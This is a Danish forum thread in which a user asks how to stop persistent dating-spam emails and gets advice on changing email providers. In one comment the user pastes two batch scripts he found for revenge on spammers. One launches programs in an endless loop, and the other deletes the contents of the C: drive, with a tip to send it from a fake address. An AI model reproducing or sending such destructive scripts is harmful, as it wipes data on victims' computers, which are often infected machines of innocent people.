Avatar billede Bent Hansen Mester
19. marts 2018 - 17:29 Der er 11 kommentarer

Spam eller uønsket e-mails

Et eller andet sted, gad jeg godt havde en lille "sød" ( nasty ) virus, som jeg kunne sende til alle de uønsket emails jeg får. Jeg er godt træt af, at side og bloker et sted mellem 30 og 50 emails hver uge.
Et eller andet sted er det nok min egen skyld, for jeg har kommet til at svare på et par stykker. Ja det ved man vel et eller andet sted godt, er en dårlig ide, men nu er skaden så sket, og hvad gør man så for at slippe ud af det. ?!
P.T ligger der 845 blokeret emails i min ( UØNSKET E MAILS )
Hvad gør man enlig. Hmm. Har overvejet at lukke min mail ( kunne godt være en løsning )
Jeg har også kigget lidt på hvem der sender mig e mails. Ved at bloker mails, kan jeg se hvem afsender er, en e mail kommer igen og igen, men med en lille ændring. Den første mails jeg fik fra denne (ukendt person ) var fra. frækketøs@gmail.com og den er så gået, fra det, til frækketøs@455gmail.com ( i skrivende stund ) fornemmer lidt at det r den samme person som sender mig disse datings tilbud, hvilket er de mails som jeg IKKE ønsker. Det sjove er, at jeg aldrig har oprettet mig på noget der ligner dating sider. Gider ikke bruge min tid eller penge på det.
Men. Jeg får godt og vel 10-15 mails ( P.T )
hvad gør jeg?
Avatar billede claes57 Ekspert
19. marts 2018 - 19:56 #1
det kommer lidt an på, hvilken email-udbyder, du har. Jeg har et domæne hos unoeuro, og der kan jeg skrue op/ned for styrken af spam-måling og så tillade de få, der skal igennem, men som falder i (fx mail fra eksperten)
Avatar billede INK Ekspert
19. marts 2018 - 20:00 #2
Du kan selvfølgelig oprette ny mailadresse, hvilket nok er nemmeste løsning.

Hvis du gider kampen, kan du lade dine mails videresende til en ny g-mail. Hver gang du så på denne konto modtaget spam, vil du markere dette og måske få Google til at tage aktion.
https://support.google.com/inbox/answer/6070440?hl=da
Avatar billede Bent Hansen Mester
19. marts 2018 - 23:24 #3
Hej.... Tak for det hurtig svar. :-)
Jeg har hotmail som mail....... Jeg har skrevet til dem, og sendt et par emails, og spurt hvorfor man fra email udbyderen, ikke "nægter" folk i at oprette emails, der er så åbenlys til brug af spam eller scam Jeg har dog aldrig fået svar.....LOL
På en eller anden måde er min mail åbenbart kommet ind i et eller andet netværk, af disse dating mails. Tror et eller andet sted at enten er det i forbindelse med de annoncer, som lover en at tjene penge ved at arbejde for google, eller også måske bare en gruppe mennesker, som forsøger at få en til at oprette en profil, på de ønsket dating sider, hvor de måske har et eller andet samarbejde med profilindhaverneJeg har forsøgt ( uden at oprette mig ) at aflure disse sider, og de er alle betalings sider, med mulighed for web-cam show, som koster 350 - 450 kr hvor 15 min. ( a la Anastasia.com - suggerdating - HOTCuple.com osv. )
Som jeg skrev, kunne jeg et eller andet sted godt ønske mig at havde en virus jeg kunne sende tilbage. Men jeg tør dog ikke kaste mig ud i det, for jeg ved intet om programmering, og hvad jeg har kunne google mig frem til, så skal man ( så vidt jeg kan læse mig frem til ) vide lidt om hvad men gør, ellers render man selv ind i den her virus.....  ( den virus jeg fandt frem til, skulle vist nok slette modtagerens hard disk.. HA. Ja det kunne sku være sjovt at sende sådan en virus. Så kan de lære det.... Hunde hoveder.....)
Avatar billede Bent Hansen Mester
19. marts 2018 - 23:29 #4
her omtalt virus beskrivelse:
1:
@echo off // It instructs to hide the commands when batch files is executed

:x //loop variable

start winword

start mspaint //open paint

start notepad

start write

start cmd //open command prompt

start explorer

start control

start calc // open calculator

goto x // infinite loop

2:
@Echo off
Del C:\ *.* |y
( hvor til bruger skriver: Note: Make a fake email to do this because this will delete his entire Drive. Also please do not blame me for any harm done to the spammers computer or to yourself if you accidentally open it or it opens while your trying to send it or something happens to the file or to your computer.

LOL. Kunne ellers være sjovt at sende sådan en. :-)
Men ved intet om det
Avatar billede claes57 Ekspert
20. marts 2018 - 07:51 #5
Mange gange udsendes spam fra maskiner, der er inficerede, og hvor bruger derfor ikke ved, at han sender spam. Det styres fra 'moderskibet'. Så idéen med at slette brugers disk er ikke godt.
Det er bedre at finde afsenders ip-adresse og anmelde spam fra den til relevante lister, som udbrydere bruger til at lukke trafik.
Avatar billede Bent Hansen Mester
20. marts 2018 - 10:53 #6
Ja. Jeg har tænkt på det. Men jeg ved ikke hvordan jeg finder fra til en IP adresse.
Det er naturlig træls at jeg er kommet til at svare på et par af dem, og det er nok også det, der har gjort, at nogen har fået fadt i min mail, som så bliver delt mellem en gruppe, som måske håber på, at jeg vil oprette en profil på en af siderne.
Jeg trpr at jeg vil lukke mailen, det skal jeg så lige ha fundet ud af hvordan jeg gør.Så kan jeg oprette en ny, og på den møde kommer jeg ud af det her. For jeg tror ikke at jeg sådan kan fjerne den/de uønsker personer, som bliver ved med at sende mig de her trælse email... Er der nogen der ved, hvordan man lukker en outlock email ned ?!
Avatar billede claes57 Ekspert
20. marts 2018 - 11:09 #7
Start med at skifte firma fra microsoft til fx google, og lav en Gmail.
Ret alle dine login-mail og husk Windows (opret Gmail, gøre den primær, slette Hotmail), bank og myndigheder/nemid
Hotmail kan umiddelbart ikke slettes - du skal bare lade være med at bruge den. Så slet alle mails i den pånær dem, du vil gemme (dem videresender du til den nye konto)
Har du smartphone/tablet, så husk at rette din mail på disse konti.
Avatar billede Bent Hansen Mester
20. marts 2018 - 15:32 #8
Ja ok...Ja det er nok den bedste løsning. Men jeg må da kunne lukke min mail ned.
Kan da forsøge at skrive til mailudbyderen... :-)
Tak for hjælp.
Avatar billede claes57 Ekspert
20. marts 2018 - 16:20 #9
Hotmail lukkes ved ikke at logge på i nogen tid. Så lukkes også konti til døde personer. Hvis man aktivt skulle afmelde, så ville døde personers konti køre uendeligt. Microsoft har valgt kun at bruge den ene metode, da det var enkelt at administrere.
Avatar billede posten Ekspert
25. marts 2018 - 14:03 #10
når du nu laver en ny har jeg fået at vide det godt at lave den med tal i
Avatar billede Bent Hansen Mester
09. april 2018 - 16:47 #11
YEP....
Jeg er bekendt med kryptering af email koder ( etc ) Koden i sig selv er der ikke noget galt med, men nu hvor jeg skifter ( eller er ved det ) email er det nok en god ide at skifte koden ud med en anden:-)
jeg takker for hjælpen